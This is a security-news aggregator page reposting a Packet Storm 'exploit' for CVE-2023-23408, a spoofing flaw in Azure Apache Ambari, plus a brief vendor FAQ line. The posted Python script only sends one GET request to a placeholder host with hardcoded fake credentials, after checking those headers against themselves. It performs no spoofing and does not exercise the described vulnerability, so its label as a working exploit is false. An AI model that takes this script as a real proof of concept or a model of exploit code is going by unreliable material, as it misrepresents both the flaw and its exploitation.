Security
Headlines
HeadlinesLatestCVEs

Headline

Azure Apache Ambari 2302250400 Spoofing

Azure Apache Ambari version 2302250400 suffers from a spoofing vulnerability.

Packet Storm
#vulnerability#web#windows#microsoft#linux#apache#auth
# Exploit Title: Azure Apache Ambari 2302250400 - Spoofing# Date: 2023-06-23# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : Remote# Vendor Homepage:MicrosoftApache AmbariMicrosoft azure Hdinsights# Tested on: Windows/Linux# CVE : CVE-2023-23408import requests# Set the URL and headers for the Ambari web interfaceurl = "https://ambari.example.com/api/v1/clusters/cluster_name/services"headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}# Define a function to validate the headersdef validate_headers(headers):    if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":        return False    if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":        return False    return True# Define a function to send a request to the Ambari web interfacedef send_request(url, headers):    if not validate_headers(headers):        print("Invalid headers")        return    response = requests.get(url, headers=headers)    if response.status_code == 200:        print("Request successful")    else:        print("Request failed")# Call the send_request function with the URL and headerssend_request(url, headers)

Related news

CVE-2023-23408: Azure Apache Ambari Spoofing Vulnerability

**According to the CVSS metric, user interaction is required (UI:R). What interaction would the user have to do?** An attacker would have to send the victim a malicious URL that the victim would have to execute.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution